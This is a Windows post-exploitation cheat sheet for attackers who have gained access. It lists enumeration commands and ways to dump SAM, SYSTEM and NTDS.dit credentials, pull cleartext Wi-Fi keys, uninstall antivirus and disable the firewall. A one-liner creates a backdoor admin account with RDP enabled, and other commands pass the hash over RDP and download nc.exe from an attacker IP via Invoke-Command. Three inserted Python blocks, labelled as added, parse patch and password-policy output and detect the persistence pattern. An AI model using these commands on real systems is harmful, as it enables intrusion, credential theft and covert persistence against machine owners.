Once you have access to a Windows machine, it is important to gather as much information as you can before continuing your hacking journey.
General commands
Here are some useful commands to execute once we are in:
whoami /all - Lists the current user, its SID, the groups the current user is a member of (with their SIDs) and the current privilege level.
systeminfo - Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed.
qprocess * - Much like tasklist, but a bit easier to read. It shows username, login method, session id, PID and binary name.
net config workstation - Displays information such as the NetBIOS name, the full computer name, the username of the user executing the command, domain, workgroups, and more.
net user test 12345678 /add - creates a local user called test with password 12345678.
net localgroup administrators /add test or net localgroup administrators test /add - adds the new user test to the local administrators group.
dir /s *pass* == *key* == *vnc* == *.config* - recursively search file names for keywords (cmd treats == as a separator, so this is one dir with several patterns).
findstr /si pass *.xml *.ini *.txt - search file contents for a string.
netsh wlan show profile <SSID> key=clear - clear text password for a wifi profile.
System files to pull
Get as much as you can for offline analysis:
%SYSTEMDRIVE%\pagefile.sys - Large file, but it contains spill-over from RAM and usually lots of good information can be pulled from it. Analyze this file using FTK Imager.
%SYSTEMROOT%\repair\SAM and %SYSTEMROOT%\System32\config\RegBack\SAM - Stores user passwords as LM and/or NTLM hashes. Extract the hashes with samdump2 (`samdump2 SYSTEM SAM > hashes.txt`) or pwdump (`pwdump system sam`).
%SYSTEMROOT%\repair\system and %SYSTEMROOT%\System32\config\RegBack\system - This is the SYSTEM registry hive. It is needed, together with SAM, to extract the user account password hashes from a Windows system; use samdump2 or pwdump as above.
%USERPROFILE%\ntuser.dat - User-level Windows registry settings; analyze using RegRipper.
%SYSTEMROOT%\System32\config\SAM, %SYSTEMROOT%\System32\config\SOFTWARE, %SYSTEMROOT%\System32\config\SECURITY and %SYSTEMROOT%\System32\config\SYSTEM - the live registry hives; analyze using RegRipper or hivexsh.
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat - Internet Explorer web browser history file. Use the pasco tool to parse and view the contents of these files and grep to filter the output on the date you are interested in: `pasco 'index.dat' | grep '04/28' | less`
%WINDIR%\System32\drivers\etc\hosts - System hosts file for local translation of host names to IP addresses.
Other interesting files
Of course, also the data files of individual programs, such as Outlook .pst files containing email messages or KeePass .kdbx databases containing user passwords.
It's best to list all installed programs and browse their folders for configuration files or files that store data from those programs. Additionally, you can search for office and text documents. Although it sounds unbelievable, many users still keep their passwords in .txt or .docx files on the desktop, in a file called e.g. passwords.txt. [SIC!]
To list all installed software you can use wmic (from cmd or PowerShell). You can use this, for example, to uninstall antivirus software:

```cmd
wmic product get name /value                                              # list software names
wmic product where name="software_name" call uninstall /Interactive:Off   # uninstall the named software
```

Note that `wmic product` only enumerates packages installed through Windows Installer (MSI) and triggers a consistency check of every such package while it runs, so it is slow, may miss software installed by other means, and leaves MsiInstaller entries in the Application event log.
Basic CMD
Version and Patches info
```cmd
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%   #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"           #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn          #Patches
hostname
DRIVERQUERY                                                    #3rd party driver vulnerable?
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List   #Registered AV products
```
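The patch list above is only useful once you turn it into a number. The following is an added example (not code from the original page): it parses the fixed-width table that `wmic qfe get Caption,Description,HotFixID,InstalledOn` prints and reports how many days have passed since the newest hotfix was installed. The sample table is constructed (the helper pads columns the way wmic aligns them to the header, and the KB numbers are placeholders), and the 45-day staleness threshold is this example's own assumption.

```python
"""Added example: parse `wmic qfe get Caption,Description,HotFixID,InstalledOn`
output and summarise patch staleness. Sample data is constructed."""
import re
from datetime import date


def _row(caption, description, hotfix, installed, widths=(44, 17, 11)):
    """Build one header-aligned line the way wmic's table formatter does
    (constructed helper used only to produce the sample below)."""
    return (caption.ljust(widths[0]) + description.ljust(widths[1])
            + hotfix.ljust(widths[2]) + installed)


# Constructed sample output; KB ids are placeholders, not real hotfixes.
SAMPLE_QFE = "\n".join([
    _row("Caption", "Description", "HotFixID", "InstalledOn"),
    _row("http://support.microsoft.com/?kbid=9990001", "Security Update", "KB9990001", "4/12/2022"),
    _row("http://support.microsoft.com/?kbid=9990002", "Update", "KB9990002", "4/12/2022"),
    _row("http://support.microsoft.com/?kbid=9990003", "Security Update", "KB9990003", "6/15/2022"),
    _row("", "Update", "KB9990004", ""),   # wmic leaves InstalledOn blank for some entries
]) + "\n"


def parse_qfe_table(text):
    """Slice every row at the column offsets of the header line.
    Returns a list of dicts keyed by column name; empty cells become ''."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    columns = [(m.group(), m.start()) for m in re.finditer(r"\S+", header)]
    records = []
    for row in rows:
        rec = {}
        for i, (name, start) in enumerate(columns):
            end = columns[i + 1][1] if i + 1 < len(columns) else None
            rec[name] = row[start:end].strip()
        records.append(rec)
    return records


def parse_installed_on(value):
    """wmic prints InstalledOn as M/D/YYYY; anything else yields None."""
    m = re.fullmatch(r"(\d{1,2})/(\d{1,2})/(\d{4})", value.strip())
    if not m:
        return None
    month, day, year = (int(x) for x in m.groups())
    return date(year, month, day)


def patch_summary(records, today_iso, max_age_days=45):
    """Summarise the hotfix list relative to `today_iso` ("YYYY-MM-DD").
    `stale` is True when nothing was installed within max_age_days."""
    today = date.fromisoformat(today_iso)
    dates = [d for d in (parse_installed_on(r.get("InstalledOn", "")) for r in records) if d]
    latest = max(dates) if dates else None
    age = (today - latest).days if latest else None
    return {
        "hotfixes": len(records),
        "security_updates": sum(r.get("Description", "").lower() == "security update" for r in records),
        "latest_install": latest.isoformat() if latest else None,
        "days_since_latest": age,
        "stale": age is None or age > max_age_days,
    }


if __name__ == "__main__":
    print(patch_summary(parse_qfe_table(SAMPLE_QFE), "2022-08-01"))
```

To use it on a real host, redirect the wmic output to a file and feed the file's text to `parse_qfe_table`; the header-offset approach copes with the variable column widths wmic picks for different data.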
Processes, Services & Software
```cmd
schtasks /query /fo LIST /v             #Verbose output of scheduled tasks
tasklist /V                             #List processes
tasklist /SVC                           #Links processes to started services
net start                               #Windows services started
wmic service list brief                 #List services
sc query                                #List of services
dir /a "C:\Program Files"               #Installed software
dir /a "C:\Program Files (x86)"         #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE   #Installed software
```
Domain info
```cmd
echo %USERDOMAIN%                       #Get domain name
echo %USERDNSDOMAIN%                    #Get domain name
echo %logonserver%                      #Get name of the domain controller
set logonserver                         #Get name of the domain controller
set log                                 #Same, by printing every variable whose name starts with "log"
net groups /domain                      #List of domain groups
net group "domain computers" /domain    #List of PCs connected to the domain
net view /domain                        #List of PCs of the domain
nltest /dclist:<DOMAIN>                 #List domain controllers
net group "Domain Controllers" /domain  #List PC accounts of domain controllers
net group "Domain Admins" /domain       #List users with domain admin privileges
net localgroup administrators /domain   #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net user /domain                        #List all users of the domain
net user <ACCOUNT_NAME> /domain         #Get information about that user
net accounts /domain                    #Password policy
nltest /domain_trusts                   #Mapping of the trust relationships
```
Users
```cmd
whoami /all                             #All info about me, take a look at the enabled tokens
whoami /priv                            #Show only privileges
net users                               #All users
dir /b /ad "C:\Users\"
net user %username%                     #Info about a user (me)
net accounts                            #Information about password requirements
qwinsta                                 #Anyone else logged in?
cmdkey /list                            #List stored credentials
net user /add [username] [password]     #Create user

::Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe"   ::The password will be prompted
```
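`net accounts` (and `net accounts /domain` in the domain block above) prints the effective password and lockout policy, which is worth checking against a baseline rather than just reading. The following is an added example, not code from the original page: it parses the `key: value` lines of `net accounts` output and reports every setting that fails a baseline. The sample output is constructed, and the baseline thresholds are this example's own assumptions, not a vendor recommendation.

```python
"""Added example: parse `net accounts` output and compare the password
and lockout policy with a baseline. Sample output is constructed."""
import re

# Constructed sample of `net accounts` output.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Assumed baseline: setting -> (rule, threshold, why it matters).
# "min" means the value must reach the threshold, "max" that it must not exceed it.
BASELINE = {
    "Minimum password length": ("min", 14, "short passwords are cheap to crack offline"),
    "Length of password history maintained": ("min", 24, "users can cycle back to an old password"),
    "Lockout threshold": ("max", 10, "online password guessing is not throttled"),
    "Maximum password age (days)": ("max", 365, "compromised passwords stay valid indefinitely"),
}


def parse_net_accounts(text):
    """Return {setting: int | None | str}. 'Never' and 'Unlimited' become
    None (no limit); non-numeric values such as the computer role stay strings."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?):\s{2,}(.+?)\s*$", line)
        if not m:            # e.g. "The command completed successfully."
            continue
        key, raw = m.group(1).strip(), m.group(2).strip()
        if raw.isdigit():
            policy[key] = int(raw)
        elif raw.lower() in ("never", "unlimited"):
            policy[key] = None
        else:
            policy[key] = raw
    return policy


def check_policy(policy, baseline=BASELINE):
    """Return a (setting, value, reason) tuple for each baseline rule that fails."""
    findings = []
    for key, (rule, threshold, why) in baseline.items():
        if key not in policy:
            findings.append((key, "missing", "setting not present in output"))
            continue
        value = policy[key]
        if value is None:
            ok = rule == "min"        # "no limit" satisfies a floor but violates a cap
        elif isinstance(value, int):
            ok = value >= threshold if rule == "min" else value <= threshold
        else:
            ok = False                # unexpected text where a number was expected
        if not ok:
            findings.append((key, value, why))
    return findings


def failing_settings(text):
    """Convenience wrapper: names of the settings that fail, sorted."""
    return sorted(key for key, _, _ in check_policy(parse_net_accounts(text)))


if __name__ == "__main__":
    for key, value, why in check_policy(parse_net_accounts(SAMPLE_NET_ACCOUNTS)):
        print(f"{key} = {value}: {why}")
```

The two-space separator in the regex is what distinguishes the setting name from its value, since `net accounts` pads every value into a fixed column; a setting reported as `Never` or `Unlimited` is treated as "no limit", which is fine for a floor such as password history but fails a cap such as lockout threshold.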
Groups
```cmd
#Local
net localgroup                                  #All available groups
net localgroup Administrators                   #Info about a group (admins)
net localgroup administrators [username] /add   #Add user to administrators

#Domain
net group /domain                               #Info about domain groups
net group /domain <domain_group_name>           #Users that belong to the group
```
List sessions
```cmd
qwinsta
klist sessions
```
Persistence with user
```cmd
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them in local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```

```cmd
::Firewall (netsh firewall is the legacy pre-Vista syntax, netsh advfirewall the current one)
netsh firewall show state                      # FW info, open ports
netsh firewall show config                     # FW info
netsh advfirewall show allprofiles

netsh advfirewall set allprofiles state off    #Turn off
netsh advfirewall set allprofiles state on     #Turn on
netsh firewall set opmode disable              #Turn off (legacy syntax)

::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable   #I found that this line is not needed
::sc config TermService start= auto                 #I found that this line is not needed
::net start Termservice                             #I found that this line is not needed

::Enable Remote Assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (new admin user, RDP + Remote Assistance + firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
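Every step of the persistence and RDP-enablement sequence above lands in the Windows Security log when account management and registry auditing are on: 4720 (account created), 4732/4728 (member added to a local/global group) and 4657 (registry value modified, given a SACL on the Terminal Server key). The following is an added example, not code from the original page, showing detection logic that correlates those events: an account created and added to a privileged group within a short window is alerted on, and the alert is rated higher when the same subject also flipped `fDenyTSConnections` or `fAllowToGetHelp`. The events are simplified dicts constructed for the example; the ten-minute window and the group list are assumptions you would tune.

```python
"""Added example: correlate Security audit events for the
'new account + privileged group + RDP enabled' persistence pattern.
Sample events are constructed, not real logs."""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "domain admins"}

# Constructed sample: a suspicious burst by CORP\jdoe, then a benign
# onboarding by CORP\hr_admin whose group change happens a day later.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4720, "subject": "CORP\\jdoe", "target": "hacker"},
    {"time": "2024-05-01T10:00:05", "id": 4732, "subject": "CORP\\jdoe", "target": "hacker",
     "group": "Administrators"},
    {"time": "2024-05-01T10:00:07", "id": 4732, "subject": "CORP\\jdoe", "target": "hacker",
     "group": "Remote Desktop Users"},
    {"time": "2024-05-01T10:00:09", "id": 4657, "subject": "CORP\\jdoe",
     "object": "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
     "value": "fDenyTSConnections", "new_value": "0"},
    {"time": "2024-05-01T14:00:00", "id": 4720, "subject": "CORP\\hr_admin", "target": "newhire"},
    {"time": "2024-05-02T09:00:00", "id": 4732, "subject": "CORP\\hr_admin", "target": "newhire",
     "group": "Remote Desktop Users"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_new_privileged_accounts(events, window_minutes=10):
    """One alert per account that is created (4720) and then added to a
    privileged group (4732/4728) within the window; later additions,
    typical of normal onboarding, are not flagged."""
    window = timedelta(minutes=window_minutes)
    created, alerts = {}, {}
    for e in sorted(events, key=_ts):
        if e["id"] == 4720:
            created[e["target"].lower()] = e
        elif e["id"] in (4732, 4728) and e.get("group", "").lower() in PRIVILEGED_GROUPS:
            c = created.get(e["target"].lower())
            if c is not None and _ts(e) - _ts(c) <= window:
                a = alerts.setdefault(e["target"], {"account": e["target"],
                                                    "created_by": c["subject"], "groups": []})
                a["groups"].append(e["group"])
    return list(alerts.values())


def find_rdp_enablement(events):
    """4657 events that switch Remote Desktop or Remote Assistance on."""
    enabling = {"fdenytsconnections": "0", "fallowtogethelp": "1"}
    hits = []
    for e in events:
        if e["id"] != 4657:
            continue
        value = e.get("value", "").lower()
        if (value in enabling and e.get("new_value") == enabling[value]
                and "terminal server" in e.get("object", "").lower()):
            hits.append({"subject": e["subject"], "value": e["value"], "time": e["time"]})
    return hits


def triage(events):
    """Combine both detections: an account alert whose creator also enabled
    RDP/Remote Assistance is rated high, otherwise medium."""
    rdp_subjects = {h["subject"] for h in find_rdp_enablement(events)}
    return [{**a, "severity": "high" if a["created_by"] in rdp_subjects else "medium"}
            for a in find_new_privileged_accounts(events)]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The 4657 leg only fires if the Terminal Server key carries an audit SACL; without it, a Sysmon registry event (ID 13) on the same value path is the usual substitute and can be mapped to the same dict shape.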
Shares
```cmd
net view                      #Get a list of computers
net view \\computer           #List shares of a computer
net use x: \\computer\share   #Mount the share locally
net share                     #Check current shares
```
Wifi
```cmd
netsh wlan show profile                    #AP SSID
netsh wlan show profile <SSID> key=clear   #Get cleartext pass
```
Copying NTDS.dit using Ntdsutil
```cmd
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
```
```cmd
cd                          #Get current dir
cd C:\path\to\dir           #Change dir
dir                         #List current dir
dir /a:h C:\path\to\dir     #List hidden files
dir /s /b                   #Recursive bare list (names only, no sizes or dates)
time                        #Get current time
date                        #Get current date
shutdown /r /t 0            #Reboot now
type <file>                 #Cat file
```
```powershell
# PowerShell: version and patch information
[System.Environment]::OSVersion.Version   #Current OS version
Get-WmiObject -Query 'select * from win32_quickfixengineering' | ForEach-Object { $_.HotFixID }   #List all patches
Get-HotFix -Description "Security update"   #List only "Security Update" patches
```
Other connected drives
```powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root
```
Users
```powershell
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
Groups
```powershell
Get-LocalGroup | ft Name                                          #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource    #Members of Administrators
```
SUDO
```powershell
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

#CHECK THAT THE CREDENTIALS WORK BY EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -ComputerName ARKHAM -ScriptBlock { whoami } -Credential $cred

#DOWNLOAD nc.exe
Invoke-Command -ComputerName ARKHAM -ScriptBlock { IWR -Uri http://10.10.14.17/nc.exe -OutFile nc.exe } -Credential $cred

#RUN A PROCESS AS THE OTHER USER (elevated via the Runas verb)
Start-Process powershell -Credential $cred -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
```
Clipboard
```powershell
Get-Clipboard
```
Processes
```powershell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
Services
```powershell
Get-Service
```
Network interfaces
```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
ARP
```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```